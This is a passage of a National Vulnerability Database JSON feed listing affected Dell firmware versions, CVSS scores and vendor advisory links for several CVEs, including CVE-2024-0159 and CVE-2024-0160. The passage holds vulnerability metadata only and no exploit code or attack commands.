"cpe:2.3:o:dell:vostro_3590_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.27.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:vostro_3590:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:vostro_3681_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.25.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:vostro_3681:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:vostro_3690_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.23.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:vostro_3690:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:vostro_3710_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.20.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:vostro_3710:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:vostro_3881_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.25.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:vostro_3881:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:vostro_3888_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.25.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:vostro_3888:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:vostro_3890_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.23.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:vostro_3890:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:vostro_3910_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.20.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:vostro_3910:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:vostro_5090_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.25.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:vostro_5090:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:vostro_5301_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.32.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:vostro_5301:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:vostro_5320_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.17.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:vostro_5320:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:vostro_5402_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.29.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:vostro_5402:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:vostro_5502_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.29.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:vostro_5502:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:vostro_5620_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.20.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:vostro_5620:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:vostro_5880_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.25.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:vostro_5880:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:vostro_5890_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.23.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:vostro_5890:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:vostro_7500_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.27.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:vostro_7500:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:vostro_7620_firmware:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:vostro_7620:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:wyse_5070_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.29.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:wyse_5070:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:wyse_5470_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.24.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:wyse_5470:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:wyse_5470_all-in-one_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.25.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:wyse_5470_all-in-one:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:wyse_7040_thin_client_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.24.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:wyse_7040_thin_client:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:xps_13_9305_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.20.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:xps_13_9305:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:xps_13_7390_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.24.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:xps_13_7390:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:xps_13_7390_2-in-1_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.30.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:xps_13_7390_2-in-1:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:xps_13_9300_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.23.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:xps_13_9300:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:xps_13_9310_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "3.21.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:xps_13_9310:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:xps_13_9310_2-in-1_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.23.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:xps_13_9310_2-in-1:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:xps_13_9315_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.19.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:xps_13_9315:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:xps_13_plus_9320_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.10.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:xps_13_plus_9320:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:xps_15_7590_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.27.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:xps_15_7590:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:xps_15_9500_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.27.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:xps_15_9500:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:xps_15_9510_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.27.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:xps_15_9510:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:xps_15_9520_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.21.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:xps_15_9520:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:xps_15_9530_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.11.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:xps_15_9530:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:xps_17_9700_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.29.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:xps_17_9700:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:xps_17_9710_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.26.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:xps_17_9710:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:xps_17_9720_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.23.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:xps_17_9720:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:xps_17_9730_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.10.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:xps_17_9730:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:xps_8940_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.18.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:xps_8940:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:xps_9315_2-in-1_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.14.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:xps_9315_2-in-1:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "HIGH", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 6.7, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 0.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-07-02T07:15Z", "lastModifiedDate" : "2024-11-21T08:45Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0159", "ASSIGNER" : "secure@dell.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-Other" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.dell.com/support/kbdoc/en-us/000218222/dsa-2024-016-security-update-for-dell-alienware-command-center-vulnerabilities", "name" : "https://www.dell.com/support/kbdoc/en-us/000218222/dsa-2024-016-security-update-for-dell-alienware-command-center-vulnerabilities", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://www.dell.com/support/kbdoc/en-us/000218222/dsa-2024-016-security-update-for-dell-alienware-command-center-vulnerabilities", "name" : "https://www.dell.com/support/kbdoc/en-us/000218222/dsa-2024-016-security-update-for-dell-alienware-command-center-vulnerabilities", "refsource" : "", "tags" : [ "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Dell Alienware Command Center, versions 5.5.52.0 and prior, contain improper access control vulnerability, leading to Denial of Service on local system." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:dell:alienware_command_center:*:*:*:*:*:*:*:*", "versionStartIncluding" : "5.2.1.0", "versionEndExcluding" : "5.6.1.0", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "NONE", "availabilityImpact" : "HIGH", "baseScore" : 5.5, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 1.8, "impactScore" : 3.6 } }, "publishedDate" : "2024-04-10T07:15Z", "lastModifiedDate" : "2025-01-31T16:45Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0160", "ASSIGNER" : "secure@dell.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-863" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.dell.com/support/kbdoc/en-us/000224763/dsa-2024-122", "name" : "https://www.dell.com/support/kbdoc/en-us/000224763/dsa-2024-122", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://www.dell.com/support/kbdoc/en-us/000224763/dsa-2024-122", "name" : "https://www.dell.com/support/kbdoc/en-us/000224763/dsa-2024-122", "refsource" : "", "tags" : [ "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Dell Client Platform contains an incorrect authorization vulnerability. An attacker with physical access to the system could potentially exploit this vulnerability by bypassing BIOS authorization to modify settings in the BIOS." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:xps_17_9700_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.30.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:xps_17_9700:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:xps_15_9500_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.31.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:xps_15_9500:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:vostro_7500_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.28.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:vostro_7500:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:precision_5750_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.30.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:precision_5750:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:precision_5550_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.31.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:precision_5550:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:latitude_3520_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.36.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:latitude_3520:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:latitude_3510_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.29.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:latitude_3510:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:latitude_3420_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.36.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:latitude_3420:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:latitude_3410_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.29.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:latitude_3410:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:inspiron_7501_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.28.0", "cpe_name" : [ ] } ] }, { 